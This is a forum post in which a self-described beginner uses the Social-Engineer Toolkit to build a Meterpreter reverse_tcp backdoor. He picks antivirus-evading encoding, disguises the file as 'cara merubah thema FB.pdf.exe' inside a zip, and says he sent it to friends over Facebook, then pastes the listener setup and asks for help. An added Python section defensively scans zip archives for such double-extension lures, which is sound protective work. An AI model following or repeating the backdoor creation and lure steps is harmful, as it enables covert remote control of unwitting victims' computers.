How to backdoor with SET via modem (dial-up)
#1
Here's the thing, bro: while I was reading articles about the SET tool, I got the idea to try it out, but.... because my laptop battery is dying, I didn't practice on a Wi-Fi network; I practiced using dial-up instead.

The scenario is like this, bro:
:: a backdoor is an infection that we plant in the victim's computer so that we can remotely control (root) the victim's computer ::

So, just for fun, I opened the console on my BackTrack 5 and typed:

root@bt:/pentest/exploits/set# ./set
-------------------------------------------------------------
Select from the menu:
1) Social-Engineering Attacks ------------> I chose this
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit
set> 1
-------------------------------------------------------------
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener ------------> I chose this
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules

99) Return back to the main menu.
set> 4
-------------------------------------------------------------
[!] ERROR:UPX packer not found in the pathname specified in config. Disabling UPX packing for executable! ============>> so why does this happen, bro???

What payload do you want to generate:

Name: Description:

1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker ---------> I chose this
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Bind Shell Execute payload and create an accepting port on remote system
5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
11) SE Toolkit Interactive Shell New custom interactive reverse shell designed for SET
12) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
13) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe)
14) Import your own executable Specify a path for your own executable

set:payloads> 2
----------------------------------------------------------------------
Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.
1) avoid_utf8_tolower (Normal)
2) shikata_ga_nai (Very Good)
3) alpha_mixed (Normal)
4) alpha_upper (Normal)
5) call4_dword_xor (Normal)
6) countdown (Normal)
7) fnstenv_mov (Normal)
8) jmp_call_additive (Normal)
9) nonalpha (Normal)
10) nonupper (Normal)
11) unicode_mixed (Normal)
12) unicode_upper (Normal)
13) alpha2 (Normal)
14) No Encoding (None)
15) Multi-Encoder (Excellent)
16) Backdoored Executable (BEST) -----> I chose this

set:encoding> 16
------------------------------------------------------------------
set:payloads> PORT of the listener [443]: ---> and I entered 5555
------------------------------------------------------------------

And the backdoor creation process runs; the backdoor file ends up in the directory /pentest/exploits/set with the name msf.exe. To arouse the victim's curiosity, I renamed it to (cara merubah thema FB.pdf.exe) and turned it into a .zip (because the FB messages feature does not allow sending files with the .exe extension) hehehehe.......

I sent the backdoor file to my friends through the FB messages feature, hoping that they would execute the file I sent (social engineering), relying on human curiosity.

Now, back to my console:

set> Start the listener now? [yes|no]: -----> I chose y
==================================================

[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 5555
LPORT => 5555
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:5555 --->> how do I make the handler use our IP?
[*] Starting the payload handler...
============================================================

This is the problem, guys..... as far as I know, we have to set the handler so that it sends back to our IP; as seen above, the handler is 0.0.0.0 with port 5555.

Can the scenario in my head actually work? I hope you guys can help....

Sorry this is long and complicated; I'm a new user who wants to learn, bro.... hehehehe ....

===================================
My weakness is that I have no strengths./
===================================
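
From the defender's side, the lure described in the post above (an executable with a document-style double extension, wrapped in a .zip to get past an attachment filter) can be caught by inspecting archive members. The following is an added example, not part of the original post: the extension lists, function names and the sample archive are assumptions, and the sample contains only harmless constructed bytes.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Assumed extension lists for illustration; tune them for your environment.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}


def classify_name(name):
    """Return 'double-extension', 'executable' or None for one member name."""
    # Normalise: keep the base name, strip trailing dots/spaces, lowercase.
    base = PurePosixPath(name.replace("\\", "/")).name.rstrip(". ").lower()
    suffixes = PurePosixPath(base).suffixes
    if not suffixes or suffixes[-1] not in EXECUTABLE_EXTS:
        return None
    if len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTS:
        return "double-extension"
    return "executable"


def scan_zip(data):
    """Scan ZIP bytes; return a list of (member name, reason) findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            reason = classify_name(info.filename)
            with zf.open(info) as member:
                is_pe = member.read(2) == b"MZ"  # DOS/PE header magic
            if is_pe and reason is None:
                reason = "pe-header-with-benign-name"
            if reason:
                findings.append((info.filename, reason))
    return findings


def build_sample_zip():
    """Constructed sample: harmless bytes only, first name modelled on the post."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("cara merubah thema FB.pdf.exe", b"MZ" + b"\x00" * 62)
        zf.writestr("notes.txt", b"plain text")
        zf.writestr("holiday.jpg", b"MZ" + b"\x00" * 62)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in scan_zip(build_sample_zip()):
        print(f"{reason:28} {name}")
```

Password-protected archives cannot be read this way and should be treated as a separate finding by whatever mail or messaging gateway runs the check.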


Messages In This Thread
How to backdoor with SET via modem (dial-up) - by arek_ndeso - 02-10-2012, 10:06 PM



